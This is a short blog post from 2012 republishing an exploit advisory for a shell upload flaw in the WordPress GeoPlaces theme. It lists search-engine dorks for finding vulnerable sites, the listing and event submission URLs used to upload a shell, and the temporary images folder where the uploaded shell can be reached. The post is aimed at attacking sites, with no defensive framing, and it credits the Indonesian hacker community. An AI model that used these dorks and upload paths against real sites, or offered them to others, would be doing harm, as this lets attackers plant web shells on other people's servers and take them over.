Friday, 28 December 2012

0 WordPress GeoPlaces Themes | shell upload vulnerability

Title      : WordPress GeoPlaces Themes | shell upload vulnerability 
Author     : Panda Undetected
Category   : web-apps
Contact    : panda-undetected@mail.com
Facebook   : hozni.monsterjack
Homepage   : http://4rtcode.net/
Vendor     : http://www.geotheme.com/
Date       : 14-Nopember-2012
Tested on  : anything OS
Dork       :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
===========================
exploit -->>
- http://127.0.0.1/?ptype=post_listing
- http://127.0.0.1/?ptype=post_event
- http://127.0.0.1/path/?ptype=post_listing
- http://127.0.0.1/path/?ptype=post_event
view -->>
- http://127.0.0.1/wp-content/themes/GeoPlaces/images/tmp/[here]
- http://127.0.0.1/path/wp-content/themes/GeoPlaces/images/tmp/[here]
note -->>
- null
thank's to -->>
- Allah my GOD, Muhammad my PROPHET, Indonesian Hacker.

video -->>
http://Z190T.com/video/

0 Comments

Bagaimana Pendapat Anda ?

Find Us on Facebook !